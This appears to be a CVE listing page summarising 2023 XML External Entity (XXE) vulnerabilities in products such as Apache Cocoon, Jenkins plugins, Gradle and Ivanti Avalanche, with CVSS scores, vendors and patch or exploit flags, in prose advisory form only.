CVE-2023-49733Improper Restriction of XML External Entity Reference vulnerability in Apache Cocoon.This issue affects Apache Cocoon: from 2.2.0 before 2.3.0. Users are recommended to upgrade to version 2.3.0, which fixes the issue.
CVSS 9.8Apache

-

Patched

Trending graph for this CVE
CVE-2023-49656Jenkins MATLAB Plugin determines whether a user-specified directory on the Jenkins controller is the location of a MATLAB installation by parsing an XML file in that directory. MATLAB Plugin 2.11.0 and earlier does not perform permission checks in several HTTP endpoints implementing related form validation. Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability. Additionally, the plugin does not configure its XML parser to prevent XML external entity (XXE) attacks. This allows attackers able to create files on the Jenkins controller file system to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery. MATLAB Plugin 2.11.1 configures its XML parser to prevent XML external entity (XXE) attacks. Additionally, POST requests and Item/Configure permission are required for the affected HTTP endpoints.
CVSS 9.8Jenkins

-

Patched

Trending graph for this CVE
CVE-2023-49110When the Kiuwan Local Analyzer uploads the scan results to the Kiuwan SAST web application (either on-premises or cloud/SaaS solution), the transmitted data consists of a ZIP archive containing several files, some of them in the XML file format. During Kiuwan's server-side processing of these XML files, it resolves external XML entities, resulting in a XML external entity injection attack. An attacker with privileges to scan source code within the "Code Security" module is able to extract any files of the operating system with the rights of the application server user and is potentially able to gain sensitive files, such as configuration and passwords. Furthermore, this vulnerability also allows an attacker to initiate connections to internal systems, e.g. for port scans or accessing other internal functions / applications such as the Wildfly admin console of Kiuwan. This issue affects Kiuwan SAST: <master.1808.p685.q13371
CVSS 7.2Jenkins

-

-

Trending graph for this CVE
CVE-2023-48362XXE in the XML Format Plugin in Apache Drill version 1.19.0 and greater allows a user to read any file on a remote file system or execute commands via a malicious XML file. Users are recommended to upgrade to version 1.21.2, which fixes this issue.
CVSS 8.8Apache

-

Patched

Trending graph for this CVE
CVE-2023-46802e-Tax software Version3.0.10 and earlier improperly restricts XML external entity references (XXE) due to the configuration of the embedded XML parser. By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.
CVSS 5.5Nta

-

-

Trending graph for this CVE
CVE-2023-46502An issue in openCRX v.5.2.2 allows a remote attacker to read internal files and execute server side request forgery attack via insecure DocumentBuilderFactory.
CVSS 9.8Opencrx

-

Patched

Trending graph for this CVE
CVE-2023-46265This vulnerability allows remote attackers to disclose sensitive information on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability.<br/>The specific flaw exists within the decode method. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.<br/> Ivanti has issued an update to correct this vulnerability. More details can be found at: <br/><a href="https://forums.ivanti.com/s/article/Avalanche-6-4-2-Security-Hardening-and-CVEs-addressed?language=en_US">https://forums.ivanti.com/s/article/Avalanche-6-4-2-Security-Hardening-and-CVEs-addressed?language=en_US</a> <br/></td>
CVSS 9.8Ivanti

Exploit

-

Trending graph for this CVE
CVE-2023-46035An issue in Fnando svg_optimizer v.0.2.6 allows a remote attacker to escalate privileges when optimizing untrusted SVG content.
CVSS HIGH

-

Patched

Trending graph for this CVE
CVE-2023-45727Proself Enterprise/Standard Edition Ver5.62 and earlier, Proself Gateway Edition Ver1.65 and earlier, and Proself Mail Sanitize Edition Ver1.08 and earlier allow a remote unauthenticated attacker to conduct XML External Entity (XXE) attacks. By processing a specially crafted request containing malformed XML data, arbitrary files on the server containing account information may be read by the attacker.
CVSS 7.5Northgrid

-

Patched

Trending graph for this CVE
CVE-2023-45612In JetBrains Ktor before 2.3.5 default configuration of ContentNegotiation with XML format was vulnerable to XXE
CVSS 9.8Jetbrains

-

Patched

Trending graph for this CVE
CVE-2023-4554Improper Restriction of XML External Entity Reference vulnerability in OpenText AppBuilder on Windows, Linux allows Server Side Request Forgery, Probe System Files. AppBuilder's XML processor is vulnerable to XML External Entity Processing (XXE), allowing an authenticated user to upload specially crafted XML files to induce server-side request forgery, disclose files local to the server that processes them. This issue affects AppBuilder: from 21.2 before 23.2.
CVSS 6.5Opentext

-

-

Trending graph for this CVE
CVE-2023-45192IBM Engineering Requirements Management DOORS Next 7.0.2 and 7.0.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 268758.
CVSS 8.2Ibm

-

Patched

Trending graph for this CVE
CVE-2023-45139A flaw was found in the subsetting module of FontTools, which contains an XML External Entity Injection (XXE) vulnerability. This flaw allows malicious actors to exploit the parsing of candidate fonts, particularly those with an OT-SVG format that includes an SVG table. Through this vulnerability, attackers can manipulate the system to resolve arbitrary entities, potentially allowing them to include files from the filesystem where FontTools is operating or even initiate web requests from the host system.
CVSS 7.5Fonttools

Exploit

Patched

Trending graph for this CVE
CVE-2023-44412D-Link D-View addDv7Probe XML External Entity Processing Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of D-Link D-View. Authentication is not required to exploit this vulnerability. The specific flaw exists within the addDv7Probe function. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM. Was ZDI-CAN-19571.
CVSS LowDlink

-

-

Trending graph for this CVE
CVE-2023-43624CX-Designer Ver.3.740 and earlier (included in CX-One CXONE-AL[][]D-V4) contains an improper restriction of XML external entity reference (XXE) vulnerability. If a user opens a specially crafted project file created by an attacker, sensitive information in the file system where CX-Designer is installed may be disclosed.
CVSS 5.5

-

Patched

Trending graph for this CVE
CVE-2023-43067 Dell Unity prior to 5.3 contains an XML External Entity injection vulnerability. An XXE attack could potentially exploit this vulnerability disclosing local files in the file system.
CVSS 6.5Dell

-

Patched

Trending graph for this CVE
CVE-2023-42445Gradle is a build tool with a focus on build automation and support for multi-language development. In some cases, when Gradle parses XML files, resolving XML external entities is not disabled. Combined with an Out Of Band XXE attack (OOB-XXE), just parsing XML can lead to exfiltration of local text files to a remote server. Gradle parses XML files for several purposes. Most of the time, Gradle parses XML files it generated or were already present locally. Only Ivy XML descriptors and Maven POM files can be fetched from remote repositories and parsed by Gradle. In Gradle 7.6.3 and 8.4, resolving XML external entities has been disabled for all use cases to protect against this vulnerability. Gradle will now refuse to parse XML files that have XML external entities.
CVSS 5.3Gradle

-

Patched

Trending graph for this CVE
CVE-2023-4218In Eclipse IDE versions < 2023-09 (4.29) some files with xml content are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).
CVSS 5Eclipse

Exploit

Patched

Trending graph for this CVE
CVE-2023-42132FD Application Apr. 2022 Edition (Version 9.01) and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.
CVSS 5.5Mhlw

-

-

Trending graph for this CVE
CVE-2023-42035Visualware MyConnection Server doIForward XML External Entity Processing Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Visualware MyConnection Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the doIForward method. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-21774.
CVSS LowVisualware

-

-

Trending graph for this CVE
CVE-2023-41933Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
CVSS 8.8Jenkins

-

Patched

Trending graph for this CVE
CVE-2023-41932Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict 'timestamp' query parameters in multiple endpoints, allowing attackers with to delete attacker-specified directories on the Jenkins controller file system as long as they contain a file called 'history.xml'.
CVSS 6.5Jenkins

-

Patched

Trending graph for this CVE